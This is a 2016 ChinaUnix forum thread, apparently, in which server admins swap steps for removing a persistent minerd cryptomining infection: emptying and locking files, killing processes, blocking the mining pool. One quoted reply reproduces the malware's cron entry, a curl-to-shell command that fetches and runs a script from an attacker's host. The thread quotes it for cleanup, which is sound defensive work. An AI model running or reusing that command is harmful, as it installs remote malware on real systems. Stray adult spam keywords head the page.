亚洲av成人无遮挡网站在线观看,少妇性bbb搡bbb爽爽爽,亚洲av日韩精品久久久久久,兔费看少妇性l交大片免费,无码少妇一区二区三区

  免費(fèi)注冊(cè) 查看新帖 |

Chinaunix

  平臺(tái) 論壇 博客 文庫(kù)
12下一頁(yè)
最近訪問板塊 發(fā)新帖
查看: 11520 | 回復(fù): 12
打印 上一主題 下一主題

[系統(tǒng)管理] 服務(wù)器被入侵,做了minerd挖礦機(jī)了,清理不掉,求大神 [復(fù)制鏈接]

論壇徽章:
0
跳轉(zhuǎn)到指定樓層
1 [收藏(0)] [報(bào)告]
發(fā)表于 2016-07-13 17:44 |只看該作者 |倒序?yàn)g覽
Linux 服務(wù)器被入侵植入了 /opt/minerd 程序,被當(dāng)做挖礦肉雞了。在網(wǎng)上找的方法都不管用,清除掉cron 里面的任務(wù),  crontab -l  已經(jīng) no crontab for root 了,并停止 crond 服務(wù)了,刪除掉系統(tǒng)里面全部名字包含  miner 的文件,然后殺掉 minerd 進(jìn)程,刪掉 /opt/minerd 文件,進(jìn)程還是會(huì)幾分鐘后就自動(dòng)啟動(dòng)起來。
求大神支招!! 拜謝

論壇徽章:
0
2 [報(bào)告]
發(fā)表于 2016-07-13 18:07 |只看該作者
系統(tǒng)里面自動(dòng)生成一個(gè) /usr/local/etc/minerd.conf   文件,內(nèi)容是登陸到目標(biāo)地址的配置,把里面內(nèi)容改掉了。 然后進(jìn)程會(huì)自動(dòng)重啟,還是顯示原來的內(nèi)容。刪掉這文件也不管用。

論壇徽章:
33
ChinaUnix元老
日期:2015-02-02 08:55:39CU十四周年紀(jì)念徽章
日期:2019-08-20 08:30:3720周年集字徽章-周	
日期:2020-10-28 14:13:3020周年集字徽章-20	
日期:2020-10-28 14:04:3019周年集字徽章-CU
日期:2019-09-08 23:26:2519周年集字徽章-19
日期:2019-08-27 13:31:262016科比退役紀(jì)念章
日期:2022-04-24 14:33:24
3 [報(bào)告]
發(fā)表于 2016-07-13 21:34 |只看該作者
  1. cd /usr/local/etc/
  2. :>minerd.conf
  3. chmod 000 minerd.conf
  4. chattr +i minerd.conf
復(fù)制代碼

論壇徽章:
0
4 [報(bào)告]
發(fā)表于 2016-07-14 11:54 |只看該作者
回復(fù) 3# Shell_HAT

方法不錯(cuò)。這個(gè)可以讓木馬程序不往對(duì)端發(fā)送消息了。但自身 /opt/minerd  程序還是在運(yùn)行,在消耗大量CPU資源。
能否還有啥辦法可以徹底清除這個(gè)木馬呢
   

論壇徽章:
33
ChinaUnix元老
日期:2015-02-02 08:55:39CU十四周年紀(jì)念徽章
日期:2019-08-20 08:30:3720周年集字徽章-周	
日期:2020-10-28 14:13:3020周年集字徽章-20	
日期:2020-10-28 14:04:3019周年集字徽章-CU
日期:2019-09-08 23:26:2519周年集字徽章-19
日期:2019-08-27 13:31:262016科比退役紀(jì)念章
日期:2022-04-24 14:33:24
5 [報(bào)告]
發(fā)表于 2016-07-14 12:43 |只看該作者
回復(fù) 4# tabtty
  1. cd /opt/
  2. killall minerd
  3. :>minerd
  4. chmod 000 minerd
  5. chattr +i minerd
復(fù)制代碼

論壇徽章:
0
6 [報(bào)告]
發(fā)表于 2016-07-16 19:19 |只看該作者
服務(wù)器受到同樣的攻擊了,有徹底解決的方法嗎

論壇徽章:
6
15-16賽季CBA聯(lián)賽之新疆
日期:2016-03-22 22:34:5915-16賽季CBA聯(lián)賽之山東
日期:2016-04-11 09:08:41程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-06-28 06:20:00程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-07-19 06:20:00每日論壇發(fā)貼之星
日期:2016-07-19 06:20:0015-16賽季CBA聯(lián)賽之青島
日期:2016-07-20 22:44:17
7 [報(bào)告]
發(fā)表于 2016-07-16 21:36 |只看該作者
本帖最后由 RE_HASH 于 2016-07-16 21:37 編輯

外面的帖子:
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -

On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

論壇徽章:
6
15-16賽季CBA聯(lián)賽之新疆
日期:2016-03-22 22:34:5915-16賽季CBA聯(lián)賽之山東
日期:2016-04-11 09:08:41程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-06-28 06:20:00程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-07-19 06:20:00每日論壇發(fā)貼之星
日期:2016-07-19 06:20:0015-16賽季CBA聯(lián)賽之青島
日期:2016-07-20 22:44:17
8 [報(bào)告]
發(fā)表于 2016-07-16 21:41 |只看該作者
系統(tǒng)安全是問題,刪掉了病毒可漏洞還在。清查一下有啥老版本的軟件,WordPress之類的。

論壇徽章:
0
9 [報(bào)告]
發(fā)表于 2016-07-16 21:52 |只看該作者
回復(fù) 8# RE_HASH


    沒有l(wèi)ady這個(gè)服務(wù)

論壇徽章:
6
15-16賽季CBA聯(lián)賽之新疆
日期:2016-03-22 22:34:5915-16賽季CBA聯(lián)賽之山東
日期:2016-04-11 09:08:41程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-06-28 06:20:00程序設(shè)計(jì)版塊每日發(fā)帖之星
日期:2016-07-19 06:20:00每日論壇發(fā)貼之星
日期:2016-07-19 06:20:0015-16賽季CBA聯(lián)賽之青島
日期:2016-07-20 22:44:17
10 [報(bào)告]
發(fā)表于 2016-07-16 22:26 |只看該作者
看看有沒有別的怪模怪樣的service
service --status-all

原帖:
http:....//security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance
您需要登錄后才可以回帖 登錄 | 注冊(cè)

本版積分規(guī)則 發(fā)表回復(fù)

  

北京盛拓優(yōu)訊信息技術(shù)有限公司. 版權(quán)所有 京ICP備16024965號(hào)-6 北京市公安局海淀分局網(wǎng)監(jiān)中心備案編號(hào):11010802020122 niuxiaotong@pcpop.com 17352615567
未成年舉報(bào)專區(qū)
中國(guó)互聯(lián)網(wǎng)協(xié)會(huì)會(huì)員  聯(lián)系我們:huangweiwei@itpub.net
感謝所有關(guān)心和支持過ChinaUnix的朋友們 轉(zhuǎn)載本站內(nèi)容請(qǐng)注明原作者名及出處

清除 Cookies - ChinaUnix - Archiver - WAP - TOP